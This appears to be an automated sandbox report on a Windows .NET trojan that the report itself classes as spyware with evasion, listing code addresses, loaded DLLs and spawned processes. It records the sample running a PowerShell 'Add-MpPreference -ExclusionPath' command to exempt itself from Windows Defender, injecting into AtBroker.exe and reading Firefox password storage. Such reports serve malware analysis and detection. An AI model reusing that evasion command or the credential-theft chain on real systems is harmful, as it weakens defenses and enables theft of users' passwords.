Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0464A352	10_2_0464A352
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_046503E6	10_2_046503E6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0459E3F0	10_2_0459E3F0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04590C00	10_2_04590C00
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04580CF2	10_2_04580CF2
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04630CB5	10_2_04630CB5
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0459AD00	10_2_0459AD00
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0462CD1F	10_2_0462CD1F
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0458ADE0	10_2_0458ADE0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045A8DBF	10_2_045A8DBF
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04590E59	10_2_04590E59
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0464EE26	10_2_0464EE26
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0464EEDB	10_2_0464EEDB
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045A2E90	10_2_045A2E90
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0464CE93	10_2_0464CE93
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04604F40	10_2_04604F40
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04632F30	10_2_04632F30
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045B0F30	10_2_045B0F30
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045D2F28	10_2_045D2F28
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04582FC8	10_2_04582FC8
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0459CFE0	10_2_0459CFE0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0460EFA0	10_2_0460EFA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0459A840	10_2_0459A840
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04592840	10_2_04592840
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045BE8F0	10_2_045BE8F0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045768B8	10_2_045768B8
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045A6962	10_2_045A6962
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0465A9A6	10_2_0465A9A6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045929A0	10_2_045929A0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0458EA80	10_2_0458EA80
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0464AB40	10_2_0464AB40
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04646BD7	10_2_04646BD7
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04581460	10_2_04581460
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0464F43F	10_2_0464F43F
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04647571	10_2_04647571
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_046595C3	10_2_046595C3
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0462D5B0	10_2_0462D5B0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045D5630	10_2_045D5630
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_046416CC	10_2_046416CC
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0464F7B0	10_2_0464F7B0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0464F0E0	10_2_0464F0E0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_046470E9	10_2_046470E9
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045970C0	10_2_045970C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0463F0CC	10_2_0463F0CC
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0465B16B	10_2_0465B16B
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0457F172	10_2_0457F172
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045C516C	10_2_045C516C
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0459B1B0	10_2_0459B1B0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_046312ED	10_2_046312ED
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045AB2C0	10_2_045AB2C0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045952A0	10_2_045952A0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0457D34C	10_2_0457D34C
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0464132D	10_2_0464132D
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045D739A	10_2_045D739A
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04609C32	10_2_04609C32
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0464FCF2	10_2_0464FCF2
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04647D73	10_2_04647D73
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04593D40	10_2_04593D40
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04641D5A	10_2_04641D5A
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045AFDC0	10_2_045AFDC0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04599EB0	10_2_04599EB0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0464FF09	10_2_0464FF09
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04591F92	10_2_04591F92
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0464FFB1	10_2_0464FFB1
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045FD800	10_2_045FD800
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045938E0	10_2_045938E0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04599950	10_2_04599950
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045AB950	10_2_045AB950
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04625910	10_2_04625910
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04603A6C	10_2_04603A6C
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04647A46	10_2_04647A46
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0464FA49	10_2_0464FA49
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0463DAC6	10_2_0463DAC6
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04631AA3	10_2_04631AA3
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0462DAAC	10_2_0462DAAC
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045D5AA0	10_2_045D5AA0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_0464FB76	10_2_0464FB76
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_04605BF0	10_2_04605BF0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045CDBF9	10_2_045CDBF9
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_045AFB80	10_2_045AFB80
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_004C1E90	10_2_004C1E90
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_004BCD18	10_2_004BCD18
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_004BCD20	10_2_004BCD20
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_004BCF40	10_2_004BCF40
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_004BAF20	10_2_004BAF20
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_004BB067	10_2_004BB067
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_004BB070	10_2_004BB070
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_004C5570	10_2_004C5570
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_004C376B	10_2_004C376B
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_004C3770	10_2_004C3770
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_004DBBC0	10_2_004DBBC0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_043EE72D	10_2_043EE72D
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_043ED7F8	10_2_043ED7F8
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_043EE274	10_2_043EE274
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_043EE394	10_2_043EE394
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_043ECA64	10_2_043ECA64
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 10_2_043ECAB8	10_2_043ECAB8

Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: String function: 045D7E54 appears 111 times
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: String function: 0457B970 appears 280 times
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: String function: 0460F290 appears 105 times
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: String function: 045FEA12 appears 86 times
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: String function: 045C5130 appears 58 times
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: String function: 0129F290 appears 105 times
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: String function: 01267E54 appears 100 times
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: String function: 01255130 appears 57 times
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: String function: 0120B970 appears 275 times
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: String function: 0128EA12 appears 86 times

Source: qxXd7JaCvGdKUp8.exe, 00000000.00000000.2075502080.0000000000132000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamemPWP.exeD vs qxXd7JaCvGdKUp8.exe
Source: qxXd7JaCvGdKUp8.exe, 00000000.00000002.2133944827.0000000009CB0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs qxXd7JaCvGdKUp8.exe
Source: qxXd7JaCvGdKUp8.exe, 00000000.00000002.2113064834.000000000069E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs qxXd7JaCvGdKUp8.exe
Source: qxXd7JaCvGdKUp8.exe, 00000000.00000002.2129085137.00000000040EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs qxXd7JaCvGdKUp8.exe
Source: qxXd7JaCvGdKUp8.exe, 00000000.00000002.2132853542.0000000006A14000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell vs qxXd7JaCvGdKUp8.exe
Source: qxXd7JaCvGdKUp8.exe, 00000000.00000002.2132853542.0000000006A14000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs qxXd7JaCvGdKUp8.exe
Source: qxXd7JaCvGdKUp8.exe, 00000006.00000002.2401256169.000000000130D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs qxXd7JaCvGdKUp8.exe
Source: qxXd7JaCvGdKUp8.exe, 00000006.00000002.2400726244.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameATBroker.exej% vs qxXd7JaCvGdKUp8.exe
Source: qxXd7JaCvGdKUp8.exe, 00000006.00000002.2400726244.0000000000CE4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameATBroker.exej% vs qxXd7JaCvGdKUp8.exe
Source: qxXd7JaCvGdKUp8.exe	Binary or memory string: OriginalFilenamemPWP.exeD vs qxXd7JaCvGdKUp8.exe

Source: qxXd7JaCvGdKUp8.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: qxXd7JaCvGdKUp8.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, YrN5AsYdF4ywHvNXNc.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, YrN5AsYdF4ywHvNXNc.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, KW9XDNHCvSedlvrreY.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, KW9XDNHCvSedlvrreY.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, KW9XDNHCvSedlvrreY.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, KW9XDNHCvSedlvrreY.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, KW9XDNHCvSedlvrreY.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.qxXd7JaCvGdKUp8.exe.413c298.0.raw.unpack, KW9XDNHCvSedlvrreY.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, YrN5AsYdF4ywHvNXNc.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.qxXd7JaCvGdKUp8.exe.9cb0000.4.raw.unpack, YrN5AsYdF4ywHvNXNc.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@13/7@7/6

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\qxXd7JaCvGdKUp8.exe.log

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Mutant created: \Sessions\1\BaseNamedObjects\hoZShvW
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ewvgruor.vok.ps1

Jump to behavior

Source: qxXd7JaCvGdKUp8.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: qxXd7JaCvGdKUp8.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: AtBroker.exe, 0000000A.00000003.2595936580.0000000000643000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINX4dENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: AtBroker.exe, 0000000A.00000002.3321572737.0000000000663000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000A.00000002.3321572737.000000000066D000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000A.00000003.2595936580.0000000000663000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 0000000A.00000002.3321572737.0000000000691000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: qxXd7JaCvGdKUp8.exe	ReversingLabs: Detection: 31%
Source: qxXd7JaCvGdKUp8.exe	Virustotal: Detection: 28%

Source: unknown	Process created: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe "C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe"
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process created: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe "C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe"
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process created: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe "C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"
Source: C:\Windows\SysWOW64\AtBroker.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe"	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process created: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe "C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe"	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process created: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe "C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe"	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
